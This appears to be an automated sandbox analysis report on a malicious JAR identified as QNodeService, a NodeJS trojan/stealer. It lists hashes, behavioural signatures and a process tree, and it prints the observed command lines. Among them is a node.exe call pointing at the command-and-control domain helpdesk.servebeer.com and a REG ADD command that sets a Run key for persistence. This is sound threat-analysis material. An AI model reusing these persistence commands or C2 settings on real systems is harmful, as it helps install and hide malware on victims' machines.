4b62b502ab63d3c23386068954fa7c73.jar

General

Target:    4b62b502ab63d3c23386068954fa7c73.jar
Filesize:  54KB
Completed: 25-11-2020 07:01
Score:     10/10
MD5:       4b62b502ab63d3c23386068954fa7c73
SHA1:      079c3c46af6b94fb838e3382bf0a0628eb636d3b
SHA256:    61f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828

Malware Config
Signatures (8)

Tactics covered: Defense Evasion, Discovery, Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    Processes: node.exe, node.exe, node.exe

    Reported IOCs

    pid  | process
    2284 | node.exe
    940  | node.exe
    1332 | node.exe
  • Adds Run key to start application
    Processes: reg.exe

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry

    Reported IOCs

    description     | ioc | process
    Key created     | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\7b7d076e-a6f1-40c6-80da-6e8913d26ac0 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
  • JavaScript code in executable

    Reported IOCs

    resource                                    | yara_rule
    behavioral2/files/0x000100000001ab81-170.dat | js
    behavioral2/files/0x000100000001ab81-175.dat | js
    behavioral2/files/0x000100000001ab81-179.dat | js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    22   | wtfismyip.com
    21   | wtfismyip.com
  • Checks processor information in registry
    Processes: node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs

    description       | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
    Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
    Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  • Suspicious behavior: EnumeratesProcesses
    Processes: node.exe, node.exe, node.exe

    Reported IOCs (one row per reported event)

    pid  | process
    2284 | node.exe
    2284 | node.exe
    2284 | node.exe
    2284 | node.exe
    940  | node.exe
    940  | node.exe
    940  | node.exe
    940  | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
    1332 | node.exe
  • Suspicious use of WriteProcessMemory
    Processes: java.exe, javaw.exe, node.exe, node.exe, node.exe, cmd.exe

    Reported IOCs

    description                       | pid  | process   | target process
    PID 656 wrote to memory of 4080   | 656  | java.exe  | javaw.exe
    PID 656 wrote to memory of 4080   | 656  | java.exe  | javaw.exe
    PID 4080 wrote to memory of 2284  | 4080 | javaw.exe | node.exe
    PID 4080 wrote to memory of 2284  | 4080 | javaw.exe | node.exe
    PID 2284 wrote to memory of 940   | 2284 | node.exe  | node.exe
    PID 2284 wrote to memory of 940   | 2284 | node.exe  | node.exe
    PID 940 wrote to memory of 1332   | 940  | node.exe  | node.exe
    PID 940 wrote to memory of 1332   | 940  | node.exe  | node.exe
    PID 1332 wrote to memory of 3824  | 1332 | node.exe  | cmd.exe
    PID 1332 wrote to memory of 3824  | 1332 | node.exe  | cmd.exe
    PID 3824 wrote to memory of 4064  | 3824 | cmd.exe   | reg.exe
    PID 3824 wrote to memory of 4064  | 3824 | cmd.exe   | reg.exe
Processes (7)
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\4b62b502ab63d3c23386068954fa7c73.jar
    Suspicious use of WriteProcessMemory
    PID:656
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\555bab1c.tmp
      Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain helpdesk.servebeer.com
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:940
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1332
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:3824
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4064
Network
MITRE ATT&CK Matrix

Tactic columns captured from the matrix (cell contents not preserved): Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation.

Techniques reported by the signatures above: Persistence: Registry Run Keys / Startup Folder; Defense Evasion: Modify Registry; Discovery: Query Registry, System Information Discovery.

Downloads
• C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
  MD5:    d90f60d7de79dd385ac5924064d5990c
  SHA1:   15d0bb24d7691881c5df0984758dbedab65eedd5
  SHA256: 9e594c60f859a967f4bb2b99b77bf5db88856693c80dfb8b4f827b08eca84d67
  SHA512: 0842a28bc210f70bd0cb2b761e7571ade8cb2c97f108bd25473f1200dfd0ff943d9b09b9c368c3c487680d0fd6d5fb84050cc52bce17c5d40bf303bda39993e7

• C:\Users\Admin\AppData\Local\Temp\555bab1c.tmp (same MD5/SHA1/SHA256 as the submitted .jar)
  MD5:    4b62b502ab63d3c23386068954fa7c73
  SHA1:   079c3c46af6b94fb838e3382bf0a0628eb636d3b
  SHA256: 61f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828
  SHA512: 10841dca540e8ef0e8e675e6f58ff7c87cfe1caf820a1083e52bfa826823e9ba1282f28735fffee6158319469b9646919166c3fa31e85f52f458b17ebd66150e

• C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js
  MD5:    3859487feb5152e9d1afc4f8cd320608
  SHA1:   7bf154c9ddf3a71abf15906cdb60773e8ae07b62
  SHA256: 8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
  SHA512: 826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

• C:\Users\Admin\node-v14.12.0-win-x64\node.exe (listed three times in the report, once per node.exe process, with identical hashes)
  MD5:    f0b11a5823c45fc2664e116dc0323bcb
  SHA1:   612339040c1f927ec62186cd5012f4bb9c53c1b9
  SHA256: 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
  SHA512: 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

• memory/940-176-0x0000026787740000-0x0000026787741000-memory.dmp
• memory/940-174-0x0000000000000000-mapping.dmp
• memory/1332-180-0x0000026037780000-0x0000026037781000-memory.dmp
• memory/1332-178-0x0000000000000000-mapping.dmp
• memory/2284-173-0x0000035A8FE00000-0x0000035A8FE01000-memory.dmp
• memory/2284-169-0x0000000000000000-mapping.dmp
• memory/3824-181-0x0000000000000000-mapping.dmp
• memory/4064-182-0x0000000000000000-mapping.dmp
• memory/4080-52-0x0000000000000000-mapping.dmp